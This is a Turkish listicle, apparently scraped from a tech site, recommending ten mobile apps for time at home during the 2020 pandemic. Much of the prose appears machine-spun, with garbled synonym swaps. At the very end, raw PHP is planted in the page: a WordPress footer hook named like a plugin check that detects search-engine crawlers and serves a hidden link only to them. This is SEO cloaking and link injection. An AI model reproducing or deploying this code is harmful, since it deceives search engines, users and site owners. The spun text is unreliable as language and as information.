Sıradaki içerik:

Aperta Motors, Güneş Enerjili Aperta sEV'i Ön Siparişe Açtı

e
sv

Evde Kalanların Kaliteli Vakit Geçireceği 10 Mobil Uygulama

06 Aralık 2020 10:16
avatar

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Korona virüsü ülkemizde de resmen görüldüğünden beri her türlü önlemi almamız için uzmanlar bas bas bağırıyor. Tabii ki bu tarz bir salgın durumunda alınabilecek en iyi tedbir kendinizi karantinaya almanızdır. Buna teşvik için bazı aka şirketler bile çalışanlarına evden çalışmalarını veya ücretli ruhsat yapmalarını sağlıyor. (Biz de Webtekno olarak büro yerine evden çalışanlar tarafındayız.)

Evde kendinizi karantinaya almak, belli bir süre sonra can sıkıntısına sebep olabiliyor. Oyun oynamak veya film/dizi izlemek gibi eğlence kaynakları da bir süre sonra bayma noktasına geliyor. Bu noktada kendinizi geliştirebileceğiniz faydalı şeyler yapmak daha güzel olabilir. Biz de bu listemizde sizler için evde kaldığınız süre boyunca faydalı zaman geçirebileceğiniz 10 mobil uygulamayı sıraladık.

Faydalı zaman geçirebileceğiniz mobil uygulamalar:

AbloWords of WondersBusuuDuolingoTEDMilyonerEv Egzersizleri – EkipmansızHızlı BeyinVoscreenStorytel: Sesli kitaplar

Dil bilmeseniz de yabancılarla iletişim kurabileceğiniz sohbet uygulaması: Ablo

ablo indir

Geliştiricisi: MassiveMediaPuanı: 4,3 yıldızBoyutu: 39 MBİndirme sayısı: 5.000.000+

Ablo, dünyanın dört bir yanından farklı insanlarla bağlantı kurup birebir sohbet edebileceğiniz bir sohbet uygulamasıdır. Karşı tarafın yazdıklarını Türkçe olarak okuyabilir, cevabınızı Türkçe olarak yazıp çevirerek gönderebilirsiniz. Hatta Ablo’da görüntülü aramaları da canlı olarak çevirebiliyorsunuz.

Ablo: Yeni insanlarla tanış ve dünyayı keşfetİNDİR

AbloİNDİR

Yeni kelimelimeleri keşfederken dünyanın farklı noktalarna götüren Words of Wonders:

Geliştiricisi: Fugo GamesPuanı: 4,6 yıldızBoyutu: 127 MBİndirme sayısı: 50.000.000+

Words of Wonders, bir kelime bulmaca oyunu. Ancak sözcük bulma eyleminden fazla daha fazlasını barındırıyor. Her farklı bölümde dünyanın farklı bir bölgesine seyahat ediyorsunuz ve bölümü bitirdiğinizde o bölge ile ilgili ilginç bir bilgi öğreniyorsunuz. Oyunda bulamadığınız kelimeler için joker kullanabiliyorsunuz ancak tahmin edebileceğiniz gibi bu jokerler jeton ile kullanılıyor ve jetonlar nakit ile satılıyor. Tabii oynayarak da kazanabiliyorsunuz ancak bu süreç zaman alıyor.

Words Of WondersİNDİR

Words Of WondersİNDİR

Temel pratiklerle 12 farklı dili öğrenebileceğiniz Busuu:

Geliştiricisi: BusuuPuanı: 4,5 yıldızBoyutu: 16 MBİndirme sayısı: 10.000.000+

Busuu, günde sadece 10 dakika pratik yaparak 12 farklı dilden birini öğrenmenize yarayan bir mobil uygulama. Bu 12 dil ise şöyle: İngilizce, İspanyolca, Almanca, Fransızca, Japonca, Portekizce, İtalyanca, Rusça, Çince, Arapça, Türkçe ve Lehçe. Hatta bu dilleri turistik veya amel amacıyla bile çalışmanız olası oluyor.

busuuİNDİR

busuuİNDİR

Yabancı lisan geliştirme konusunda en popüler uygulamalardan: Duolingo

duolingo

Geliştiricisi: DuolingoPuanı: 4,7 yıldızBoyutu: 12 MBİndirme sayısı: 100.000.000+

Duolingo da farklı diller öğrenebileceğiniz öbür bir uygulama. Özellikle 4,7 puanıyla dikkat çeken Duolingo uygulamasında başta İngilizce olmak üzere İspanyolca, Fransızca, İtalyanca ve birçok dili planlanmış dersler halinde işleyerek öğrenebiliyorsunuz. Tabii ki öğrenmek kolay bir süreç değil ancak dikkatinizi verip uğraşırsanız gerçekten size fayda sağlayacaktır.

DuolingoİNDİR

DuolingoİNDİR

İlham verici insanlardan ders niteliğinde konuşmalar: TED

ted talks

Geliştiricisi: TED Conferences LLCPuanı: 4,7 yıldızBoyutu: 18 MBİndirme sayısı: 10.000.000+

Eğitim kategorisinde yer meydan TED mobil uygulaması için ‘konferansların Netflix’i’ diyebiliriz. Uygulamada tüm TED konuşmalarını veya konferansını Türkçe altyazılı bir biçimde izleyebilirsiniz. Aynı Netflix’teki gibi konuşmaları telefonunuza indirip çevrimdışı bir şekilde izlemeniz de mümkün. Bunların dışında uygulamada muhtelif kategorilerde podcast’ler de bulunmakta.

TED TalksİNDİR

TED TalksİNDİR

TV'deki halinden daha zor bir bilgi yarışması: Milyoner

Geliştiricisi: Submarine AppsPuanı: 4,3 yıldızBoyutu: 24 MBİndirme sayısı: 1.000.000+

Milyoner uygulaması, uzun yıllardır televizyonlarda gördüğümüz ‘Kim 500.000/1.000.000 Milyon İster?’ yarışması formatının birebir telefona uyarlanmış hali. Bu oyunda zaman geçirdikçe genel kültürünüzü fazlasıyla geliştirebilir ve aynı zamanda eğlenebilirsiniz. Kesinlikle zaman kaybı olmayacaktır zira birçok bilgi ediniyorsunuz.

MilyonerİNDİR

Evde ekipmansız ısınma hareketleri yapmanızı sağlayacak uygulama: Ev Egzersizleri

Geliştiricisi: Leap Fitness GroupPuanı: 4,8 yıldızBoyutu: 16 MBİndirme sayısı:

Ev Egzersizleri mobil uygulaması, tüm ana kas gruplarınız için günlük egzersiz rutinleri sunar. Günde sadece birkaç dakikada, evde kas yapabilir ve zinde kalabilirsiniz. Üstelik bir ekipmana da gerek kalmıyor zira uygulamadaki egzersizlerin tamamı kendi vücut ağırlığınız ile yaptığınız egzersizler. Spora başlamadan önce ısınmayı ve gerinme rutinlerinizi yapmayı unutmayın 🙂

Ev Egzersizleri – EkipmansızİNDİR

Ev Egzersizleri – EkipmansızİNDİR

Hem çocuklar hem de yetişkinler için genel kültür hazinesi: Hızlı Beyin

Geliştiricisi: Andrei & Aleksandr KrupiankouPuanı: 4,4 yıldızBoyutu: 7,7 MBİndirme sayısı: 5.000.000+

Hızlı Beyin uygulaması, içerisinde muhtelif beyin egzersizleri bulunduran bir zeka oyunudur. Uygulamanın içerisinde matematiksel oyun, bulmaca, 2048 oyunu, tren konsantrasyonu, IQ testi, akıllı ve hızlı düşünme egzersizleri ve tepki hızı arttırıcı egzersizler bulunuyor. Özellikle çocuklarınız için oldukça faydalı bir uygulama.

Hızlı BeyinİNDİR

Filmler, müzik klipleri ve belgeseller üzerinden yabancı lisan öğrenin: Voscreen

Geliştiricisi: VoscreenPuanı: 4,5 yıldızBoyutu: 4,9 MBİndirme sayısı: 1.000.000+

Voscreen uygulaması, öbür lisan öğrenme uygulamalarından biraz farklı bir teknik kullanıyor. Ücretsiz bir şekilde indirip kullanabileceğiniz mobil uygulamada filmleri, müzik kliplerini, belgeselleri veya çizgi filmleri kısa videolar halinde izleyerek İngilizce öğreniyorsunuz. Bir dili öğrenirken en aka gerekliliğin o dili ana dili olarak konuşan kişilerden duymak olduğunu göz önüne alırsak, Voscreen de abes zamanınız için oldukça faydalı bir uygulama.

VoscreenİNDİR

VoscreenİNDİR

Kitabın sesli hali: Storytel

Storytel

Geliştiricisi: Storytel Sweden ABPuanı: 4,2 yıldızBoyutu: 16 MBİndirme sayısı: 10.000.000+

Storytel, belki de bu listedeki en faydalı uygulama diyebiliriz. Storytel bir sesli kitap uygulaması. Uygulamada binlerce kitabı gerek ünlü sanatçılar gerek profesyonel seslendirmeciler gerekse bilim insanları tarafından seslendirilmiş bir biçimde dinlemeniz mümkün. Uygulamada sınırsız olarak kitap dinleyebilmek veya indirip çevrimdışı olarak dinlemek için aynı Spotify veya Netflix gibi abone olmanız gerekiyor.

StorytelİNDİR

StorytelİNDİR

Böylelikle bir Webtekno listesinin daha sonuna gelmiş bulunmaktayız. Oyunlar, bilim, umumi teknoloji sorunlarını içeren, bu ve bunun gibi birçok faydalı içerik ve rehberden haberdar olmak için sitemizi takipte kalmayı ve düşüncelerinizi/önerilerinizi aşağıdaki yorumlar kısmında belirtmeyi lütfen unutmayın 🙂

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');